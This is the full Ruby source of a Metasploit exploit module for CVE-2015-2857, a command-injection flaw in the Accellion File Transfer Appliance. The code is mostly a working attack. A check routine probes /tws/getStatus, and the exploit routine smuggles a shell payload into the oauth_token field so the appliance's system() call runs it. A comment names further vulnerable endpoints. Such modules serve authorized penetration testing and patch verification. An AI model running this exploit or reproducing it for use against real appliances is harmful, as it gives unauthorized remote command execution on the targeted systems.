Path: blob/master/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb
21666 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Accellion FTA getStatus verify_oauth_token Command Execution',15'Description' => %q{16This module exploits a metacharacter shell injection vulnerability in the Accellion17File Transfer appliance. This vulnerability is triggered when a user-provided18'oauth_token' is passed into a system() call within a mod_perl handler. This19module exploits the '/tws/getStatus' endpoint. Other vulnerable handlers include20'/seos/find.api', '/seos/put.api', and /seos/mput.api'. This issue was confirmed on21version FTA_9_11_200, but may apply to previous versions as well. This issue was22fixed in software update FTA_9_11_210.23},24'Author' => [ 'hdm' ],25'License' => MSF_LICENSE,26'References' => [27['URL', 'http://r-7.co/R7-2015-08'],28['CVE', '2015-2857']29],30'Platform' => ['unix'],31'Arch' => ARCH_CMD,32'Privileged' => false,33'Payload' => {34'Space' => 1024,35'DisableNops' => true,36'Compat' =>37{38'PayloadType' => 'cmd',39'RequiredCmd' => 'generic perl telnet',40}41},42'Targets' => [43[ 'Automatic', {} ]44],45'DefaultTarget' => 0,46'DisclosureDate' => '2015-07-10',47'Notes' => {48'Reliability' => UNKNOWN_RELIABILITY,49'Stability' => UNKNOWN_STABILITY,50'SideEffects' => UNKNOWN_SIDE_EFFECTS51}52)53)5455register_options(56[57Opt::RPORT(443),58OptBool.new('SSL', [true, 'Use SSL', true])59]60)61end6263def check64uri = '/tws/getStatus'6566res = send_request_cgi({67'method' => 'POST',68'uri' => uri,69'vars_post' => {70'transaction_id' => rand(0x100000000),71'oauth_token' => 'invalid'72}73})7475unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"MD5 token is invalid"/76return Exploit::CheckCode::Safe77end7879res = send_request_cgi({80'method' => 'POST',81'uri' => uri,82'vars_post' => {83'transaction_id' => rand(0x100000000),84'oauth_token' => "';echo '"85}86})8788unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/89return Exploit::CheckCode::Safe90end9192Msf::Exploit::CheckCode::Vulnerable93end9495def exploit96# The token is embedded into a command line the following:97# `/opt/bin/perl /home/seos/system/call_webservice.pl $aid oauth_ws.php verify_access_token '$token' '$scope'`;98token = "';#{payload.encoded};echo '"99100uri = '/tws/getStatus'101102# Other exploitable URLs:103# * /seos/find.api (works with no other changes to this module)104# * /seos/put.api (requires some hoop jumping, upload)105# * /seos/mput.api (requires some hoop jumping, token && upload)106107print_status("Sending request for #{uri}...")108res = send_request_cgi({109'method' => 'POST',110'uri' => uri,111'vars_post' => {112'transaction_id' => rand(0x100000000),113'oauth_token' => token114}115})116117if res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/118print_status("Valid response received...")119else120if res121print_error("Unexpected reply from the target: #{res.code} #{res.message} #{res.body}")122else123print_error("No reply received from the target")124end125end126127handler128end129end130131132